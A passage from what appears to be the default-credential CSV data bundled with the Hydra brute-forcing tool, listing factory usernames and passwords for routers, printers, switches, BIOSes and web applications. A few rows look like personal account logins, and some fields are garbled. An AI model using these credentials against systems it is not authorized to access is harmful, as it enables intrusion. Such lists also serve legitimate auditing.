3.4.8,Telnet,,,Guest,,\nveritas,Cluster Server,,,admin,password,,,\nveritas,Cluster Server,,http,admin,password,Admin,,\nverity,Ultraseek,,http,admin,admin,Admin,,\nverizon,9100EM,,,admin,password,,,\nverizon,9100VM,,,admin,password,,,\nverizon,MI424WR,,,admin,password,,,\nvertex,VERTEX 1501,,5.05,root,vertex25,,,\nvertex,Vertex 1501,5.05,,root,vertex25,Admin,,\nvextrec technology,PC BIOS,,,,Vextrex,,,\nvextrectechnology,PC BIOS,,Console,,Vextrex,,,\nvienuke,VieBoard,,2.6,admin,admin,,,\nvienuke,VieBoard,2.6,,admin,admin,Administrator,,\nvina technologies,ConnectReach,,,,,,,\nvinatechnologies,ConnectReach,,,,,,3.6.2,\nvirginmedia,Netgear Superhub,,,admin,changeme,,,\nvirtual programming,VP-ASP Shopping Cart,,5.0,admin,admin,,,\nvirtual programming,VP-ASP Shopping Cart,,5.0,vpasp,vpasp,,,\nvirtualprogramming,VP-ASP Shopping Cart,5,,admin,admin,Admin,,\nvirtualprogramming,VP-ASP Shopping Cart,5,,vpasp,vpasp,Admin,,\nvirtualprogramming,VP-ASP Shopping Cart,5.0,,admin,admin,Admin,,\nvirtualprogramming,VP-ASP Shopping Cart,5.0,,vpasp,vpasp,Admin,,\nvisa vap,VAP,,,root,QNX,,,\nvisa,Visa VAP,,Telnet/modem,root,QNX,root,,\nvisualnetworks,Visual Uptime T1 CSU/DSU,1,Console,admin,visual,Admin,,\nvobis,PC BIOS,,,,merlin,,,\nvobis,PC BIOS,,Console,,merlin,,,\nvoicegenietechnologies,VoiceGenie,,,pw,pw,Admin,,\nvoiceobjects,VoiceObjects,,,voadmin,manager,,,\nvonage,Cisco ATA-186,,HTTP,,,,,\nvonage,D-Link VTA,,HTTP,user,user,,,\nvonage,D-Link VWR,,HTTP,user,user,,,\nvonage,Linksys PAP2/PAP2V2,,HTTP,admin,admin,,,\nvonage,Linksys RT31P2,,HTTP,admin,admin,,,\nvonage,Linksys RTP300,,HTTP,admin,admin,,,\nvonage,Linksys WRT54GP2,,HTTP,admin,admin,,,\nvonage,Linksys WRTP54G,,HTTP,admin,admin,,,\nvonage,Motorola VT1005,,HTTP,,,,,\nvonage,Motorola VT2142,,HTTP,router,router,,,\nvonage,Motorola VT2442,,HTTP,router,router,,,\nvonage,Motorola VT2542,,HTTP,router,router,,,\nvonage,Uniden UIP1869V,,HTTP,admin,admin,,,\nvonage,V-Tech IP8100,,HTTP,VTech,VTech,,,\nvonage,VDV21-VD,,HTTP,router,router,,,\nvpasp,VP-ASP Shopping Cart,,,admin,admin,,,\nvpasp,VP-ASP Shopping Cart,,,vpasp,vpasp,,,\nvxworks,misc,,Multi,admin,admin,Admin,,\nvxworks,misc,,Multi,guest,guest,Guest,,\nwaav,X2,,Admin,admin,waav,,,\nwanadoo,Livebox,,Multi,admin,admin,Admin,,\nwanco,NTCIP Message Sign Software,,,,ABCD,,,\nwanco,NTCIP Message Sign Software,,,,Guest,,,\nwanco,NTCIP Message Sign Software,,,,NTCIP,,,\nwanco,NTCIP Message Sign Software,,,,Public,,,\nwang,Wang,,Multi,CSG,SESAME,Admin,,\nwarracorp,janon,,guest,pepino,pepino,,,\nwarracorp,janon,2.1,HTTP,pepino,pepino,guest,,\nwatch guard,firebox 1000,,,admin,,,,\nwatch guard,firebox 1000,,Admin,admin,,,,\nwatchguard,FireBox,,,,wg,,,\nwatchguard,SOHO and SOHO6,all versions,FTP,user,pass,Admin,works only from the inside LAN,\nwatchguard,XTM,,,admin,readwrite,,,\nwatchguard,XTM,,,status,readonly,,,\nwatchguard,firebox 1000,,Multi,admin,,Admin,,\nweb wiz,Forums,,7.x,Administrator,letmein,,,\nwebexcel,AL-2108,,192.168.1.254,admin,admin,Admin,,\nwebexcel,AL-2112,,192.168.1.254,admin,admin,Admin,,\nwebexcel,PT-3808,,10.0.0.2,admin,epicrouter,Admin,,\nwebexcel,PT-3812,,10.0.0.2,admin,epicrouter,Admin,,\nweblogic,weblogic,,yes,system,weblogic,,,\nwebmin,Webmin,,,admin,,,default linux install,\nwebmin,Webmin,,,admin,hp.com,,,\nwebmin,Webmin,,http,admin,hp.com,Admin,,\nwebmin,Webmin,,http,admin,hp.com,Admin,default HP-UX install,\nwebramp,410i etc...,,,wradmin,trancell,,,\nwebramp,Unknown,,,wradmin,trancell,,,\nwebwiz,Forums,7.x,http,Administrator,letmein,Admin,,\nwestell,2200,,Multi,admin,password,Admin,,\nwestell,Versalink 2200,,,admin,password,,,\nwestell,Versalink 327,,,admin,password,,,\nwestell,Versalink 327,,Multi,admin,,Admin,,\nwestell,Versalink 6100,,,admin,password,,,\nwestell,Wang,,Multi,CSG,SESAME,Admin,,\nwestell,Wirespeed wireless router,,Multi,admin,sysAdmin,Admin,,\nwestell,Wirespeed,,Multi,admin,password,Admin,,\nwestell,Wirespeed,,Multi,admin,sysAdmin,Admin,,\nwim bervoets,WIMBIOSnbsp BIOS,,,,Compleri,,,\nwim bervoets,WIMBIOSnbsp BIOS,,Admin,,Compleri,,,\nwimbervoets,WIMBIOSnbsp BIOS,,Console,,Compleri,Admin,,\nwinwork,iso sistemi,,,operator,,,,\nwinwork,iso sistemi,,Admin,operator,,,,\nwireless inc.,WaveNet,,,root,rootpass,,,\nwirelessinc,WaveNet 2458,,,root,rootpass,,,\nworldclient,AdminServer,,,WebAdmin,Admin,,,\nworldclient,AdminServer,,HTTP:2001,WebAdmin,Admin,WorldClient,,\nworldclient,AdminServer,,WorldClient,WebAdmin,Admin,,,\nwww.soft.vip600.com,123,,,anonymous,anonymous,,,\nwwwboard,WWWADMIN.PL,,,WebAdmin,WebBoard,,,\nwwwboard,WWWADMIN.PL,,Admin,WebAdmin,WebBoard,,,\nwwwboard,WWWADMIN.PL,,HTTP,WebAdmin,WebBoard,Admin,,\nwyse,Thin Clients,Windows Embedded Standard 2009,Console,administrator,Wyse#123,Admin access to console,,\nwyse,V90 series thin client,all,BIOS,,Fireport,BIOS,,\nwyse,V90,,VNC,,Wyse,,,\nwyse,WT 1125 SE,,,user,user,,,\nwyse,WT9235LE,XPe (XP embedded),console login,Administrator,Administrator,local Admin,(case sensitive),\nwyse,Winterm 3150,,VNC,,password,Admin,,\nwyse,Winterm,,5440XL,VNC,winterm,,,\nwyse,Winterm,,5440XL,root,wyse,,,\nwyse,Winterm,,Admin,root,wyse,,,\nwyse,Winterm,,VNC,VNC,winterm,,,\nwyse,Winterm,5440XL,Console,root,wyse,Admin,,\nwyse,Winterm,5440XL,VNC,VNC,winterm,VNC,,\nwyse,Winterm,9455XL,BIOS,,Fireport,BIOS,Case Sensitive,\nwyse,rapport,4.4,FTP,rapport,r@p8p0r+,ftp logon to controlling ftp server.,,\nwyse,v90le,,console,Administrator,Administrator,,,\nwyse,v90le,unknown,console,Administrator,Administrator,,,\nwyse,winterm,,Multi,root,,Admin,,\nx-micro,WLAN 11b Broadband Router,,,1502,1502,,,\nx-micro,WLAN 11b Broadband Router,,,super,super,,,\nxavi,7000-ABA-ST1,,Console,,,Admin,,\nxavi,7001,,Console,,,Admin,,\nxavi,X7722r,,,admin,admin,,,\nxavi,X7722r,,192.168.1.1,admin,admin,,,\nxavi,X7722r,all,HTTP,admin,admin,192.168.1.1,,\nxerox,4110,,http://192.168.0.1,11111,x-admin,root,,\nxerox,61xx,All,DocuSP,Administrator,administ,,,\nxerox,7232,,,11111,x-admin,,,\nxerox,77xx,,http,admin,1111,,,\nxerox,ApeosIII 4300,,HTTP,11111,x-admin,Admin,,\nxerox,ColorQube 9201,,console,local IP address,admin,1111,,\nxerox,DocuCentre-II C6500,all versions,http,11111,x-admin,Admin,,\nxerox,DocuCentre-II C6500,all versions,http,11111,x-admin,Admin,source http://www.support.xerox.com/SRVS/CGI-BIN/WEBCGI.EXE/,\nxerox,DocuColor 1632,,console,,11111,Admin,,\nxerox,DocuColor 1632,,http,admin,admin,Admin,,\nxerox,DocuColor,,1632,,11111,,,\nxerox,DocuColor,,1632,admin,admin,,,\nxerox,Docucentre-IV 3065,,http,11111,x-admin,Admin,Account lockout due to too many incorrect login attempts can be cleared by rebooting ther machine (Power switch on right side of main output tray),\nxerox,Document Centre 405,-,HTTP,admin,admin,Admin,,\nxerox,Document Centre 425,,HTTP,admin,,Admin,,\nxerox,Document Centre 425,,HTTP,admin,22222,Admin,works for access panel 2,\nxerox,Document Centre 432,,,admin,22222,,,\nxerox,Document Centre 432,,http,admin,22222,Admin,,\nxerox,Document Centre c320,,HTTP,admin,admin,,Default machine admin password: 11111,\nxerox,Document Centre,,,NSA,nsa,,,\nxerox,Docuprint 340a,,,admin,x-admin,Web interface login,,\nxerox,Fiery,,,Administrator,Fiery.1,,,\nxerox,Fiery,,HTTP,Administrator,Fiery.1,,,\nxerox,Fiery,2,remove desktop,Administrator,fiery.1,,,\nxerox,Fiery,2.0,remove desktop,Administrator,fiery.1,,,\nxerox,M24,,LAN,admin,admin,,,\nxerox,Multi Function Equipment,,,admin,2222,,,\nxerox,Multi Function Equipment,,Admin,admin,2222,,,\nxerox,Multi Function Equipment,,Multi,admin,2222,Admin,combo fax/scanner/printer with network access,\nxerox,Phaser 3600,,,admin,1111,,,\nxerox,Phaser,3600,Intranet / network,admin,1111,Administrator access,,\nxerox,Work Center Pro C2128,,http,admin,1111,,,\nxerox,WorkCenter 2640,,http://,admin,1111,,,\nxerox,WorkCenter Pro 428,,,admin,admin,,,\nxerox,WorkCenter Pro 428,,Admin,admin,admin,,,\nxerox,WorkCentre 265,v1,http,admin,1111,,,\nxerox,WorkCentre 3325,,IP address,admin,1111,Admin,,\nxerox,WorkCentre 5230,all,web,11111,x-admin,,,\nxerox,WorkCentre 5675,All,Console, HTTP,admin,1111,,\nxerox,WorkCentre 5675,All,Console,HTTP,admin,1111,Admin access to the console and web interfaces,\nxerox,WorkCentre 57xx,,http,admin,1111,,,\nxerox,WorkCentre 7245,,http,11111,x-admin,Admin,,\nxerox,WorkCentre 7328,,http,11111,x-admin,,,\nxerox,WorkCentre 7335,,,11111,x-admin,,,\nxerox,WorkCentre 7345,,,11111,x-admin,,,\nxerox,WorkCentre 7346,,HTTP,admin,1111,Administrative Access,,\nxerox,WorkCentre 7425,,http or console,admin,1111,,,\nxerox,WorkCentre 7530,All version,Http,admin,1111,,,\nxerox,WorkCentre 7665,,,admin,1111,,,\nxerox,WorkCentre M118,,shared 'admintool' folder,admin,x-admin,admin,\\192.168.0.1admintool,\nxerox,WorkCentre M118,,shared 'admintool' folder,admin,x-admin,admin,\\\\192.168.0.1\\admintool,\nxerox,WorkCentre M20i,,http,admin,1111,Admin,,\nxerox,WorkCentre PE 120i,,IP address,admin,1111,,,\nxerox,WorkCentre Pro 35,,HTTP,admin,1111,Admin,,\nxerox,WorkCentre Pro 35,all,HTTP,admin,1111,admin,WorkCentre Pro 35,\nxerox,WorkCentre Pro 420,,,admin,sysadm,,,\nxerox,WorkCentre Pro 428,,HTTP,admin,admin,Admin,,\nxerox,WorkCentre Pro 45,,HTTP,admin,1111,Admin,,\nxerox,WorkCentre Pro,,45,admin,1111,,,\nxerox,WorkCentre and DocumentCentre,,,savelogs,crash,,,\nxerox,WorkCentre,7232/7242,http,11111,x-admin,Administrator,,\nxerox,WorkCentre/DocumentCentre,,,savelogs,crash,,,\nxerox,Workcenter 245 Pro,,HTTP,admin,1111,,,\nxerox,Workcentre 7120,All,Http,admin,1111,Admin,,\nxerox,WprkCentre 7845,,,admin,1111,,,\nxerox,work centre,7328,console,,,,,\nxerox,workcentre 5222,,http://,11111,x-admin,,,\nxerox,workcentre 5225A,,,admin,11111,,,\nxerox,workcentre,3220,web,admin,1111,admin,,\nxerox,xerox,,Multi,,admin,Admin,,\nxerox,xerox,,Multi,admin,admin,Admin,,\nxincom,XC-DPG402,,http://192.168.1.1,admin,,Administration,,\nxincom,XC-DPG502,,http://192.168.1.1,admin,,Administration,,\nxincom,XC-DPG503,,http://192.168.1.1,admin,,Administration,,\nxincom,XC-DPG602,,http://192.168.1.1,admin,,Administration,,\nxincom,XC-DPG603,,http://192.168.1.1,admin,,Administration,,\nxirrus,XR-1000H Series,,http://10.0.2.1,admin,admin,Admin,,\nxmicro,WLAN 11b Access Point,1.2.2,Multi,super,super,Admin,,\nxmicro,X-Micro WLAN 11b Broadband Router,1.2.2 1.2.2.3 1.2.2.4 1.6.0.0,Multi,super,super,Admin,From BUGTRAQ,\nxmicro,X-Micro WLAN 11b Broadband Router,1.6.0.1,HTTP,1502,1502,Admin,From BUGTRAQ,\nxylan,Omnistack 1032CF,,,admin,password,,3.2.8,\nxylan,Omnistack 4024,,,admin,password,,3.4.9,\nxylan,Omniswitch,,,admin,switch,,,\nxylan,Omniswitch,,,admin,switch,,3.1.8,\nxylan,Omniswitch,,,diag,switch,,,\nxylan,Omniswitch,,Admin,admin,switch,,,\nxylan,Omniswitch,,Telnet,admin,switch,Admin,,\nxylan,Omniswitch,,Telnet,diag,switch,Admin,,\nxyplex,MX-1600,,,setpriv,system,,,\nxyplex,Routers,,,,system,,,\nxyplex,Routers,,Admin,,system,,,\nxyplex,Routers,,Port 7000,,access,User,,\nxyplex,Routers,,Port 7000,,system,Admin,,\nxyplex,Routers,,User,,access,,,\nxyplex,Terminal Server,,,,access,,,\nxyplex,Terminal Server,,,,system,,,\nxyplex,Terminal Server,,Admin,,system,,,\nxyplex,Terminal Server,,Port 7000,,access,User,,\nxyplex,Terminal Server,,Port 7000,,system,Admin,,\nxyplex,Terminal Server,,User,,access,,,\nxyplex,mx-16xx,,,setpriv,system,,,\nxyplex,switch,3.2,Console,,,Admin,,\nyahoo,mail,yes,Multi,1234567890,bloggs,yes,,\nyahoo,messenger,messenger,Multi,handsome_123_handsome,plsdontguess,password,,\nyahoo,messenger,messenger,Multi,intelligent_guy_priyank,passwordguy,password,,\nyakumo,Routers,,,admin,admin,,,\nyakumo,Routers,,HTTP,admin,admin,Admin,,\nyuxin,YWH10 IP Phone,,http,User,1234,Admin,,\nyuxin,YWH10 IP Phone,,http,User,19750407,Admin,,\nyuxin,YWH100 IP Phone,,http,User,1234,Admin,,\nyuxin,YWH100 IP Phone,,http,User,19750407,Admin,,\nyuxin,YWH200 IP Phone,,http,User,1234,Admin,,\nyuxin,YWH200 IP Phone,,http,User,19750407,Admin,,\nyuxin,YWH300 IP Phone,,http,User,1234,Admin,,\nyuxin,YWH300 IP Phone,,http,User,19750407,Admin,,\nzcom,Wireless,,SNMP,root,admin,Admin,,\nzcom,XG1021 N,,,admin,password,,,\nzebra,10/100 Print Server,,Multi,admin,1234,Admin,,\nzenith,PC BIOS,,,,3098z,,,\nzenith,PC BIOS,,,,Zenith,,,\nzenith,PC BIOS,,Admin,,3098z,,,\nzenith,PC BIOS,,Admin,,Zenith,,,\nzenith,PC BIOS,,Console,,3098z,Admin,,\nzenith,PC BIOS,,Console,,Zenith,Admin,,\nzeos,PC BIOS,,,,zeosx,,,\nzeos,PC BIOS,,Admin,,zeosx,,,\nzeos,PC BIOS,,Console,,zeosx,Admin,,\nzeus,Zeus Admin Server,,4.1r2,admin,,,,\nzeus,Zeus Admin Server,4.1r2,http,admin,,,,\nzoom,ADSL X3,,,admin,zoomadsl,,,\nzoom,ADSL X3,,HTTP,admin,zoomadsl,,,\nzoom,IG-4165,,http://192.168.123.254,,admin,Administration,,\nzoom,ZOOM ADSL Modem,,Console,admin,zoomadsl,Admin,,\nzte,MF30,,192.168.0.1,admin,admin,Admin,,\nzte,MF60,,192.168.0.1,admin,admin,Admin,,\nzte,MF62,,192.168.0.1,Administrator,admin,Admin,,\nzte,all models,all versions,http://192.168.0.1,admin,admin,admin,,\nzxdsl,ZXDSL 831,,,ZXDSL,ZXDSL,,,\nzyxel,641 ADSL,,,,1234,,,\nzyxel,642R,,Admin,,1234,,,\nzyxel,642R,,Telnet,,1234,Admin,,\nzyxel,660,,,1234,1234,,,\nzyxel,660R-61C,1.0,http://192.168.1.1/,mikucha,abadaifice,root,abadaifice,\nzyxel,660R-61C,401373,http://192.168.1.1,admin,1234,Admin,,\nzyxel,660R-61C,401373,http://192.168.1.1,admin,1234,Admin,abadaifice,\nzyxel,ADSL routers,All ZyNOS Firmwares,Multi,admin,1234,Admin,this is default for dsl routers provided by the ISP firstmile.no,\nzyxel,Cable modems,,http:192.168.1.1:8080,webadmin,1234,user,desprogamado,\nzyxel,G-1000,,http://192.168.1.2,,1234,Administration,,\nzyxel,G-2000 Plus,,http://192.168.1.1,,1234,Administration,,\nzyxel,G-3000H,,http://192.168.1.2,,1234,Administration,,\nzyxel,G-560,,http://192.168.1.2,,1234,Administration,,\nzyxel,G-570S,,http://192.168.1.2,,1234,Administration,,\nzyxel,Generic Routers,,,,1234,,,\nzyxel,Generic Routers,,Admin,,1234,,,\nzyxel,Generic Routers,,Telnet,,1234,Admin,,\nzyxel,Generic,,Admin,Admin,atc456,,,\nzyxel,ISDN Router Prestige 100IH,,,,1234,,,\nzyxel,ISDN-Router Prestige 1000,,,,1234,,,\nzyxel,P-2302R,,192.168.10.1,,1234,Admin,,\nzyxel,P-2302RL,,192.168.1.1,,1234,Admin,,\nzyxel,P-2602H,,,,1234,Admin,,\nzyxel,P-2602HWL,,192.168.1.1,admin,1234,Admin,,\nzyxel,P-2602HWL-D1A,,192.168.1.1,admin,1234,Admin,,\nzyxel,P-320W,,,user11,@12345,,,\nzyxel,P-330 W EE,4312,,admin,1234,,,\nzyxel,P-623,,http://192.168.1.1,admin,1234,Administration,,\nzyxel,P-645,,http://192.168.1.1,admin,1234,Administration,,\nzyxel,P-650,,http://192.168.1.1,admin,1234,Administration,,\nzyxel,P-660H,T1v3s,192.168.1.1,admin,admin,admin,,\nzyxel,P-660H-T1 v2,V3.40,192.168.1.1,admin,admin,password,,\nzyxel,P-660HW,,http://192.168.1.1,,1234,Administration,,\nzyxel,P-660HW,t1,http://192.168.1.1,,,admin,,\nzyxel,P-660R,,http://192.168.1.1,admin,2633170,,,\nzyxel,P-660RU,,http://192.168.1.1,,1234,Administration,,\nzyxel,P-660h-t1 v2,ALL VERSIONS ETC,192.168.1.1,,,,,\nzyxel,P-661H,,192.168.1.1,admin,1234,Admin,,\nzyxel,P-661HW,,192.168.1.1,admin,1234,Admin,,\nzyxel,P-663H-51,,192.168.1.1,admin,1234,Admin,,\nzyxel,P-794M,,http://192.168.1.1,admin,1234,Administration,,\nzyxel,P-861H,,Multi,admin,1234,Web + Telnet,,\nzyxel,P-964APR,,http://192.168.1.1:8080,user,1234,Administration,,\nzyxel,P-964CM,,http://192.168.1.1:8080,user,1234,Administration,,\nzyxel,P-964CR,,http://192.168.1.1:8080,user,1234,Administration,,\nzyxel,P-971M,,http://192.168.1001,webadmin,1234,Administration,,\nzyxel,P-974,,,admin,1234,,,\nzyxel,P861H,,Multi,admin,1234,Web + Telnet,,\nzyxel,P861H,,Web + Telnet,admin,1234,,,\nzyxel,Prestige ,660R-61C,,,1234,,,\nzyxel,Prestige 100IH,,,,1234,,,\nzyxel,Prestige 100IH,,Console,,1234,Admin,,\nzyxel,Prestige 128 modem-router,,,,1234,,any,\nzyxel,Prestige 300 series,,,,1234,,zynos 2.*,\nzyxel,Prestige 643,,,,1234,,,\nzyxel,Prestige 643,,Console,,1234,Admin,,\nzyxel,Prestige 645,,HTTP,admin,1234,Admin,,\nzyxel,Prestige 650,,Multi,1234,1234,Admin,,\nzyxel,Prestige 652HW-31 ADSL Router,,,admin,1234,,,\nzyxel,Prestige 652HW-31 ADSL Router,,HTTP,admin,1234,Admin,http://192.168.1.1,\nzyxel,Prestige 652HW-31,,,admin,1234,,,\nzyxel,Prestige 660H,,192.168.1.1,,1234,Admin,,\nzyxel,Prestige 660HW,,Multi,admin,admin,Admin,,\nzyxel,Prestige 900,,HTTP,webadmin,1234,Admin,192.168.1.1:8080,\nzyxel,Prestige P660HW,,Multi,admin,1234,Admin,,\nzyxel,Prestige,,,,1234,,,\nzyxel,Prestige,,,root,1234,,,\nzyxel,Prestige,,Admin,,1234,,,\nzyxel,Prestige,,Admin,root,1234,,,\nzyxel,Prestige,,FTP,root,1234,Admin,,\nzyxel,Prestige,,HTTP,,1234,Admin,http://192.168.1.1,\nzyxel,Prestige,,Telnet,,1234,Admin,,\nzyxel,Prestige,660R-61C,,,1234,,,\nzyxel,Switch,,Web/Telnet/CLI,admin,1234,,,\nzyxel,Switch,ES-2108-G,Multi,admin,1234,Web/Telnet/CLI,,\nzyxel,VSG1432,Generic,http://192.168.1.254,admin,1234,2012-09-19,,\nzyxel,VSG1432,Telus ADSL,http://192.168.1.254,admin,telus,2012-09-19,,\nzyxel,WAP3205,1.2.,http://192.168.1.2,,1234,wi-fi,,\nzyxel,Windows Vista,P- 2602HWN-D7A,192.168.1.1.,anatoij,1234,1234,,\nzyxel,ZyWALL Series Prestige 660R-61C,,Multi,,admin,Admin,,\nzyxel,ZyWall 2,,HTTP,,,Admin,,\nzyxel,ZyWall 5 UTM,,192.168.1.1,1234,1234,Admin,,\nzyxel,Zywall,,Admin,admin,1234,,,\nzyxel,Zywall,,Multi,admin,1234,Admin,,\nzyxel,keenetic 4g,192.168.1.1:8080,,admin,1234,,,\nzyxel,linux,4,http://192.168.1.1:8080,user,mr37net,root,-,\nzyxel,p-660hw,t1,http://192.168.1.1,,,admin,,\nzyxel,tm6941g,,http://192.168.1.254,admin,abc123,admin,admin,\nzyxel,zyxer,cable moden,http:192.168.1.1:8080,webadmin,1234,user,desprogamado,\n" }, { "path": "dpl4hydra_local.csv", "content": "1net1,R-90,,,admin,1,Admin,,\n2wire,2071-A,All,gateway.2wire.net or 10.0.0.138,,,Admin,,\n2wire,2700HG B,4.25.19,http://192.168.1.254,,,,,\n2wire,2701HGV,All,,admin,,Admin,,\n2wire,2701HGV-W,All,http://10.0.0.138 or http://gateway.2wire.net or http://home,,(printed on the bottom of the device),Admin,,\n2wire,Wireless Routers (most models),,http,,Wireless,Admin,,\n2wire,Wireless Routers,,,http,,,,\n360systems,Image Server 2000,,,factory,factory,,,\n3bb,NT3BB-1PWN-124,,,admin,3bb,Admin,,\n3bb,NT3BB-4PWN,,,admin,3bb,Admin,,\n3com,,,,adm,,,,\n3com,,,,admin,synnet,,,\n3com,,,,manager,manager,,,\n3com,,,,monitor,monitor,,,\n3com,,,,read,synnet,,,\n3com,,,,root,letmein,,1.25,\n3com,,,,security,security,,,\n3com,,,,write,synnet,,,\n3com,3C16405,,,admin,,,,\n3com,3C16405,,Console,Administrator,,Admin,,\n3com,3C16405,,Multi,,,Admin,,\n3com,3C16405,,Multi,admin,,Admin,,\n3com,3C16406,,,admin,,,,\n3com,3C16406,,Multi,admin,,Admin,telnet or serial,\n3com,3C16450,,,admin,,,,\n3com,3C16450,,Multi,admin,,Admin,telnet or serial,\n3com,3CR414492,All,192.168.200.254,root,!root,Root,,\n3com,3CRADSL72 ,1.2,Multi,,1234admin,Admin,snmp open by default with public / private community,\n3com,3CRADSL72,1.2,Multi,,1234admin,Admin,snmp open by default with public / private community,\n3com,3CRWDR101A75,All,http://192.168.1.1,,admin,Admin,,\n3com,3CRWE52196,,,,admin,,,\n3com,3CRWE554G72,All,http://192.168.1.1,,admin,Admin,,\n3com,3Com SuperStack 3 Switch 3300XM,,,security,security,,,\n3com,3Com SuperStack 3 Switch 3300XM,,Admin,security,security,,,\n3com,3c16405,,,,,,,\n3com,3c16405,,,Administrator,,,,\n3com,812,,HTTP,Administrator,admin,Admin,,\n3com,AirConnect AP,,,,comcomcom,,,\n3com,AirConnect Access Point,,01.50-01,,,,,\n3com,AirConnect Access Point,,Admin,,,,,\n3com,AirConnect Access Point,,SNMP,,comcomcom,,,\n3com,AirConnect Access Point,01.50-01,Multi,,,Admin,,\n3com,Boson router simulator,3.66,HTTP,admin,admin,User,,\n3com,CB9000 / 4007,3,Console,Type User: FORCE,,Admin,This will recover a lost password and reset the switch config to Factory Default,\n3com,Cable Managment System SQL Database (DOCSIS DHCP),,,DOCSIS_APP,3com,,Win2000 MS,\n3com,Cable Managment System SQL Database (DOSCIC DHCP),,,DOCSIS_APP,3com,,Win2000 & MS,\n3com,CellPlex,,,admin,synnet,,,\n3com,CellPlex,,7000,,,,,\n3com,CellPlex,,7000,admin,admin,,,\n3com,CellPlex,,7000,root,,,,\n3com,CellPlex,,7000,tech,tech,,,\n3com,CellPlex,,Admin,admin,synnet,,,\n3com,CellPlex,,Admin,tech,tech,,,\n3com,CellPlex,,HTTP,admin,synnet,Admin,,\n3com,CellPlex,,Multi,,,Admin,,\n3com,CellPlex,,Multi,admin,admin,Admin,,\n3com,CellPlex,7000,Multi,admin,admin,Admin,RS-232/telnet,\n3com,CellPlex,7000,Telnet,admin,admin,Admin,,\n3com,CellPlex,7000,Telnet,operator,,Admin,,\n3com,CellPlex,7000,Telnet,root,,Admin,,\n3com,CellPlex,7000,Telnet,tech,,Admin,,\n3com,CellPlex,7000,Telnet,tech,tech,Admin,,\n3com,CoreBuilder 6000,,,debug,tech,,,\n3com,CoreBuilder,,,debug,synnet,,,\n3com,CoreBuilder,,,tech,tech,,,\n3com,CoreBuilder,,7000/6000/3500/2500,debug,synnet,,,\n3com,CoreBuilder,,7000/6000/3500/2500,tech,tech,,,\n3com,CoreBuilder,7000/6000/3500/2500,Telnet,,,Admin,,\n3com,CoreBuilder,7000/6000/3500/2500,Telnet,,admin,Admin,,\n3com,CoreBuilder,7000/6000/3500/2500,Telnet,debug,synnet,,,\n3com,CoreBuilder,7000/6000/3500/2500,Telnet,tech,tech,,,\n3com,HiPerACT,,v4.1.x,admin,,,,\n3com,HiPerARC,,Admin,adm,,,,\n3com,HiPerARC,,v4.1.x,adm,,,,\n3com,HiPerARC,v4.1.x,Telnet,adm,,,,\n3com,HiPerARC,v4.1.x,Telnet,adm,,Admin,,\n3com,HiPerARC,v4.1.x,Telnet,admin,,Admin,,\n3com,Home Connect,,,User,Password,,,\n3com,Internet Firewall,3C16770,HTTP,admin,password,Admin,,\n3com,LANplex,,,debug,synnet,,,\n3com,LANplex,,,tech,tech,,,\n3com,LANplex,,2500,debug,synnet,,,\n3com,LANplex,,2500,tech,,,,\n3com,LANplex,,Admin,tech,,,,\n3com,LANplex,2500,Telnet,debug,synnet,,,\n3com,LANplex,2500,Telnet,tech,,Admin,,\n3com,LANplex,2500,Telnet,tech,tech,,,\n3com,LANplex/Corebuilder line,multiple models,,debug,synnet,,,\n3com,LinkBuilder,,,,,,,\n3com,LinkBuilder,,Admin,,,,,\n3com,LinkBuilder,,Telnet,,,Admin,,\n3com,LinkSwitch and CellPlex,,,debug,synnet,,,\n3com,LinkSwitch and CellPlex,,,tech,tech,,,\n3com,LinkSwitch,,,tech,tech,,,\n3com,LinkSwitch,,2000/2700,tech,tech,,,\n3com,LinkSwitch,2000/2700,Telnet,tech,tech,,,\n3com,LinkSwitch,2700,,debug,synnet,,,\n3com,Linkbuilder 3500,,,administer,administer,,,\n3com,NAC (Network Access Card),,,adm,,,,\n3com,NBX100,,,administrator,0,,2.8,\n3com,NetBuilder,,,,ANYCOM,,,\n3com,NetBuilder,,,,admin,,,\n3com,NetBuilder,,SNMP,,ANYCOM,snmp-read,,\n3com,NetBuilder,,SNMP,,ILMI,snmp-read,,\n3com,NetBuilder,,SNMP,,admin,User,SNMP_READ,\n3com,NetBuilder,,User,,admin,,,\n3com,NetBuilder,,snmp-read,,ANYCOM,,,\n3com,NetBuilder,,snmp-read,,ILMI,,,\n3com,Netbuilder,,,Root,,,,\n3com,Netbuilder,,,admin,,,,\n3com,Netbuilder,,HTTP,Root,,Admin,http://10.1.0.1,\n3com,Netbuilder,,Multi,admin,,Admin,,\n3com,Office Connect ISDN Routers,,5x0,,PASSWORD,,,\n3com,Office Connect ISDN Routers,,Admin,,PASSWORD,,,\n3com,OfficeConnect 812 ADSL,,,adminttd,adminttd,,,\n3com,OfficeConnect 812 ADSL,,01.50-01,admin,,,,\n3com,OfficeConnect 812 ADSL,,Admin,admint|,admint|,,,\n3com,OfficeConnect 812 ADSL,,Multi,adminttd,adminttd,Admin,,\n3com,OfficeConnect 812 ADSL,01.50-01,Multi,admin,,Admin,,\n3com,OfficeConnect ADSL Wireless 11g Firewall Router,3CRWDR100-72,HTTP,,admin,Admin,http://192.168.1.1,\n3com,OfficeConnect ISDN Routers,5x0,Telnet,,PASSWORD,Admin,,\n3com,OfficeConnect Remote 812,,,root,!root,,,\n3com,OfficeConnect Remote 840,,,root,!root,,,\n3com,OfficeConnect Remote Router,,812 ADSL 840 SDSL,root,!root,,,\n3com,OfficeConnect Wireless 11g Cable/DSL Gateway,,,,admin,,,\n3com,OfficeConnect Wireless 11g Cable/DSL Gateway,,HTTP,,admin,Admin,,\n3com,OfficeConnect,,Multi,,,Admin,,\n3com,OfficeConnect,11g,Multi,admin,,User,,\n3com,Router,3000/5000 Series,Boot Prompt,,,Admin,,\n3com,SS III Switch,,4xxx (4900 - sure),recovery,recovery,,,\n3com,Shark Fin,Comcast-supplied,HTTP,User,Password,Diagnostics page,192.160.100.1,\n3com,SuperStack 2700,,,tech,tech,,,\n3com,SuperStack 3,,4400-49XX,manager,manager,,,\n3com,SuperStack 3,,4XXX,admin,,,,\n3com,SuperStack 3,,4XXX,monitor,monitor,,,\n3com,SuperStack II Dual Speed 500,,,security,security,,,\n3com,SuperStack II Netbuilder,11.1,Multi,,,Admin,,\n3com,SuperStack II Switch 1100,,,manager,manager,,,\n3com,SuperStack II Switch 1100,,,security,security,,,\n3com,SuperStack II Switch 3300,,,manager,manager,,,\n3com,SuperStack II Switch,,,debug,synnet,,,\n3com,SuperStack II Switch,,,manager,manager,,Any,\n3com,SuperStack II Switch,,,monitor,monitor,,Any,\n3com,SuperStack II Switch,,,tech,password,,Any,\n3com,SuperStack II 